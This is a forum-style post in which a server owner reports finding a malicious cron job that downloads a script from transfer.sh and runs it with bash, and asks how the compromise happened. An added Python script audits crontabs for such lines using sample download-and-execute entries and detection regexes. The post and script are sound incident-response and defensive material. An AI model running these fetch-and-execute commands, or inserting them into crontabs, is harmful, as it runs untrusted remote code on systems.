I set up a new virtual server a couple of days ago. I installed some open source software on it from a reputable company. I was running 12.04 (64 bit), since that's the supported OS the software ran on. I updated the base installation with the most recent packages using upgrade and dist-upgrade.
Today, I was setting up cron as root to run some tasks, and I saw some very suspicious code I was not familiar with, which loaded a script from https://transfer.sh.
Specifically, this was one line of code in the cron job:
Code:
wget -O .cmd https://transfer.sh/ioAzh/tmp.Ker9jozIal && bash .cmd
It looks like an attempt to gather data from my server, but I'm not quite sure what specifically.
I've shut the server down now, but I'd still like to run this software. It uses Python and runs a hosted webserver.
How can I figure out what led to this situation? Any insight on what they were attempting to take? How do I ensure this doesn't happen again in the future?
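One way to audit crontabs for the download-and-execute pattern quoted in the post, as an added example that is not from the original post: the sample crontab below is constructed for the demo (the post's own wget line is included among benign entries), and the function flags entries that fetch a remote resource and run it.

```python
import re

# Constructed sample crontab for the demo; only the wget line comes from the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * wget -O .cmd https://transfer.sh/ioAzh/tmp.Ker9jozIal && bash .cmd
*/10 * * * * curl -s http://example.invalid/x.sh | sh
30 2 * * * /usr/local/bin/backup.sh --quiet
"""

DOWNLOADER = re.compile(r"\b(wget|curl)\b")
URL = re.compile(r"https?://\S+")
# Download piped straight into a shell interpreter
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z|da)?sh\b")
# Download saved to a file that is then executed in the same cron entry
FETCH_THEN_RUN = re.compile(r"\b(?:wget|curl)\b.*(?:&&|;)\s*(?:ba|z|da)?sh\s+\S+")


def suspicious_cron_lines(crontab_text):
    """Return (line_no, url, reason) for entries that fetch a remote script and execute it."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue  # blank line or comment
        if not DOWNLOADER.search(entry):
            continue  # no downloader invoked, nothing to flag here
        url_match = URL.search(entry)
        url = url_match.group(0) if url_match else None
        if PIPE_TO_SHELL.search(entry):
            findings.append((no, url, "download piped into shell"))
        elif FETCH_THEN_RUN.search(entry):
            findings.append((no, url, "downloaded file executed in same entry"))
    return findings


if __name__ == "__main__":
    for no, url, reason in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"line {no}: {reason} ({url})")
```

On a real host, feed it the contents of /etc/crontab, /etc/cron.d/* and /var/spool/cron/crontabs/* instead of the sample text.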